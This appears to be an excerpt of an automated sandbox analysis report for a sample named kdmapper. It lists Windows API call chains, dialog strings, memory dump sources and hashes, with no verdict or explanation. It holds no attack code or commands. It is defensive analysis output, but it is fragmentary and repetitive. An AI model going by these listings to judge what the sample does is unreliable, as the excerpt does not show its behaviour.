                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                                                          • String ID: GETPASSWORD1$xzg
                                                                                                                                                                          • API String ID: 445417207-3224123136
                                                                                                                                                                          • Opcode ID: ffad09e540ab2b11757841834f4695782f95f8bccaffd134db53b74a72b04b09
                                                                                                                                                                          • Instruction ID: 59b1316780393ad793541ee8e17ebb101f50771efdf65db881c65a7be59c8a01
                                                                                                                                                                          • Opcode Fuzzy Hash: ffad09e540ab2b11757841834f4695782f95f8bccaffd134db53b74a72b04b09
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C11C432900128B6EB219F64AC49FFF376FEF19B00F100124FB46B62C0C7A09A4597E1
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadBitmapW.USER32(00000065), ref: 0063B6ED
                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0063B712
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0063B744
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0063B767
                                                                                                                                                                            • Part of subcall function 0063A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0063B73D,00000066), ref: 0063A6D5
                                                                                                                                                                            • Part of subcall function 0063A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A6EC
                                                                                                                                                                            • Part of subcall function 0063A6C2: LoadResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A703
                                                                                                                                                                            • Part of subcall function 0063A6C2: LockResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A712
                                                                                                                                                                            • Part of subcall function 0063A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0063B73D,00000066), ref: 0063A72D
                                                                                                                                                                            • Part of subcall function 0063A6C2: GlobalLock.KERNEL32(00000000), ref: 0063A73E
                                                                                                                                                                            • Part of subcall function 0063A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0063A762
                                                                                                                                                                            • Part of subcall function 0063A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0063A7A7
                                                                                                                                                                            • Part of subcall function 0063A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0063A7C6
                                                                                                                                                                            • Part of subcall function 0063A6C2: GlobalFree.KERNEL32(00000000), ref: 0063A7CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                          • String ID: ]
                                                                                                                                                                          • API String ID: 1797374341-3352871620
                                                                                                                                                                          • Opcode ID: 87d854abea7507d8c3b3d03eb65d9d982a913e9ebc1ede37e88b0175cb1a67ef
                                                                                                                                                                          • Instruction ID: cf2793a6b65e1677556c80071dd14167c97e9db4ea17c543fd18992ca660e9d4
                                                                                                                                                                          • Opcode Fuzzy Hash: 87d854abea7507d8c3b3d03eb65d9d982a913e9ebc1ede37e88b0175cb1a67ef
                                                                                                                                                                          • Instruction Fuzzy Hash: A901C43690011177C71177B49C0AABF7A7BEBC1B52F081114FA40B7391DF618D0553E1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
                                                                                                                                                                            • Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0063D64B
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0063D661
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 0063D675
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000068), ref: 0063D684
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                                                          • String ID: RENAMEDLG
                                                                                                                                                                          • API String ID: 445417207-3299779563
                                                                                                                                                                          • Opcode ID: 7dd4c2795e2dcfa92d4dd2847018bfe77104278a7e153fdcf6665d19bb27c208
                                                                                                                                                                          • Instruction ID: b2a29add5c34c04d5240d9b333a2e51be2ce2a4b84bf78410daca2ae07d09139
                                                                                                                                                                          • Opcode Fuzzy Hash: 7dd4c2795e2dcfa92d4dd2847018bfe77104278a7e153fdcf6665d19bb27c208
                                                                                                                                                                          • Instruction Fuzzy Hash: 54012833248220BBD3214F64BD0AF9B776FFB9BF01F110510F345AA1D0C6A299058BB5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00647E24,00000000,?,00647DC4,00000000,0065C300,0000000C,00647F1B,00000000,00000002), ref: 00647E93
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00647EA6
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00647E24,00000000,?,00647DC4,00000000,0065C300,0000000C,00647F1B,00000000,00000002), ref: 00647EC9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: c90b5720a99e9dba94491417883ee971c99218f6439cc1ca83593d5f0dbc4ce9
                                                                                                                                                                          • Instruction ID: d7f79d08a480dac167a32029e6d26d7f14e2656402ecf6b29fec1c12582c1fd3
                                                                                                                                                                          • Opcode Fuzzy Hash: c90b5720a99e9dba94491417883ee971c99218f6439cc1ca83593d5f0dbc4ce9
                                                                                                                                                                          • Instruction Fuzzy Hash: F6F04431900318BBDB11DFA0DC09B9EBFB6EB44752F0141A9F805A2350DB319F44CA90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0063081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00630836
                                                                                                                                                                            • Part of subcall function 0063081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0062F2D8,Crypt32.dll,00000000,0062F35C,?,?,0062F33E,?,?,?), ref: 00630858
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0062F2E4
                                                                                                                                                                          • GetProcAddress.KERNEL32(006681C8,CryptUnprotectMemory), ref: 0062F2F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                          • API String ID: 2141747552-1753850145
                                                                                                                                                                          • Opcode ID: 4ec81b058b01588576d1cf92b77d35d655a17e93aca67f8b1006e89cef610543
                                                                                                                                                                          • Instruction ID: 138ab6414233672fbd12808bbe7caeb04fe083fe5da54ca6e9a8e0be9f378c1b
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ec81b058b01588576d1cf92b77d35d655a17e93aca67f8b1006e89cef610543
                                                                                                                                                                          • Instruction Fuzzy Hash: B9E08671910B319EDB21DF78A84DB427AE66F04F41F15882DF4DA93780D6B5D5448B50
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustPointer$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2252061734-0
                                                                                                                                                                          • Opcode ID: 089763c929b144ead1f35acf94e4eadc8045eb9a2713cd498a04f582de8ec531
                                                                                                                                                                          • Instruction ID: 6c19c5c761533799a58f1b664d7ae7248eaaf5a9533d0c008900d935291547c3
                                                                                                                                                                          • Opcode Fuzzy Hash: 089763c929b144ead1f35acf94e4eadc8045eb9a2713cd498a04f582de8ec531
                                                                                                                                                                          • Instruction Fuzzy Hash: AA51BF72A00213AFDB699F14D8A5BBAB7A6FF54310F74412DF801876A1D731ED81D790
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0064BF39
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0064BF5C
                                                                                                                                                                            • Part of subcall function 00648E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0064BF82
                                                                                                                                                                          • _free.LIBCMT ref: 0064BF95
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0064BFA4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                          • Opcode ID: da2683351fb5c74184c734d19f8d0db0cac79075b8c8c90e51da425e62fca32f
                                                                                                                                                                          • Instruction ID: 797e9f223ade93c5aed4a9b02d9f7f3e8fcf78d169e684de6745aaee4f247976
                                                                                                                                                                          • Opcode Fuzzy Hash: da2683351fb5c74184c734d19f8d0db0cac79075b8c8c90e51da425e62fca32f
                                                                                                                                                                          • Instruction Fuzzy Hash: E201D472601721BF27615ABA9C4CCBB7A6FDEC2FA13141129F908C3301EF60CD0695B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00661030,00000200,006491AD,0064617E,?,?,?,?,0062D984,?,?,?,00000004,0062D710,?), ref: 0064986E
                                                                                                                                                                          • _free.LIBCMT ref: 006498A3
                                                                                                                                                                          • _free.LIBCMT ref: 006498CA
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00653A34,00000050,00661030), ref: 006498D7
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00653A34,00000050,00661030), ref: 006498E0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: 1170f94534f2619af15700d04ac3d5eff74ec827625c2cd890ee9683fe50a11b
                                                                                                                                                                          • Instruction ID: f4996e3ad8c0007185457a9c600d9766fa73f0ff1587517564c25b28043c910a
                                                                                                                                                                          • Opcode Fuzzy Hash: 1170f94534f2619af15700d04ac3d5eff74ec827625c2cd890ee9683fe50a11b
                                                                                                                                                                          • Instruction Fuzzy Hash: A20144321C07016FC352A76CAC8995B252BDFD27B2B210639F410933D2EE218D029238
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 006311CF: ResetEvent.KERNEL32(?), ref: 006311E1
                                                                                                                                                                            • Part of subcall function 006311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 006311F5
                                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00630F21
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?), ref: 00630F3B
                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 00630F54
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00630F60
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00630F6C
                                                                                                                                                                            • Part of subcall function 00630FE4: WaitForSingleObject.KERNEL32(?,000000FF,00631206,?), ref: 00630FEA
                                                                                                                                                                            • Part of subcall function 00630FE4: GetLastError.KERNEL32(?), ref: 00630FF6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1868215902-0
                                                                                                                                                                          • Opcode ID: ce6d60afff57b69aa1090fcc52a7393c5cf5184474ae956bbf31376e5cb29d06
                                                                                                                                                                          • Instruction ID: f2c445b184fa7589c522b2de15749b2d41179b0ea0d951e095dc3a8357056d24
                                                                                                                                                                          • Opcode Fuzzy Hash: ce6d60afff57b69aa1090fcc52a7393c5cf5184474ae956bbf31376e5cb29d06
                                                                                                                                                                          • Instruction Fuzzy Hash: 23015271500754EFD7229B64DD84BC6BBABFB08B51F00092DF15A522A0C7757A54CA94
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 0064C817
                                                                                                                                                                            • Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
                                                                                                                                                                            • Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4
                                                                                                                                                                          • _free.LIBCMT ref: 0064C829
                                                                                                                                                                          • _free.LIBCMT ref: 0064C83B
                                                                                                                                                                          • _free.LIBCMT ref: 0064C84D
                                                                                                                                                                          • _free.LIBCMT ref: 0064C85F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 1107eb0ad91174066f1ddbecdd2e6b15606da3d74c67a42e038ab57d3c2019b8
                                                                                                                                                                          • Instruction ID: 83b552b3e89488ac7026828176b899b37381787f1b12efa896c5f181e7e8fe61
                                                                                                                                                                          • Opcode Fuzzy Hash: 1107eb0ad91174066f1ddbecdd2e6b15606da3d74c67a42e038ab57d3c2019b8
                                                                                                                                                                          • Instruction Fuzzy Hash: 54F06232912200AFCBA4DB68E586C4A7BFBAE10721B54281DF108D7753CF71FC80CA58
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00631FE5
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00631FF6
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00632006
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00632014
                                                                                                                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0062B371,?,?,00000000,?,?,?), ref: 0063202F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CompareString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3397213944-0
                                                                                                                                                                          • Opcode ID: e4b81658a7300a453e859007cce783c29f9fbb6987c632037bfc56dbfc2ec075
                                                                                                                                                                          • Instruction ID: 9d4d77bca75702d56d0a1bdc0a9943f3d3c4145502ccf2abac22cf7a8b5784e3
                                                                                                                                                                          • Opcode Fuzzy Hash: e4b81658a7300a453e859007cce783c29f9fbb6987c632037bfc56dbfc2ec075
                                                                                                                                                                          • Instruction Fuzzy Hash: 10F06D32008124BBCF265F50EC09D8E3F27EB40B70F11800AF61A5A161CB7296A5D6D4
                                                                                                                                                                          APIs
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063B579
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B58A
                                                                                                                                                                          • IsDialogMessageW.USER32(000303EC,?), ref: 0063B59E
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0063B5AC
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0063B5B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1266772231-0
                                                                                                                                                                          • Opcode ID: 1f84bde1faea2dc0647cf6a97feb966a9e8b3244667a248419be5928a4de0cf5
                                                                                                                                                                          • Instruction ID: 8b5064e8b7107737e21fa4efa707a776566408fb85d49ae75e8a2ff1cd08be07
                                                                                                                                                                          • Opcode Fuzzy Hash: 1f84bde1faea2dc0647cf6a97feb966a9e8b3244667a248419be5928a4de0cf5
                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0BD71A0122ABBCB209FE5DC4CDDB7FADEE057A17005615B505D2210EB74D605CBF0
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _swprintf
                                                                                                                                                                          • String ID: %ls$%s: %s
                                                                                                                                                                          • API String ID: 589789837-2259941744
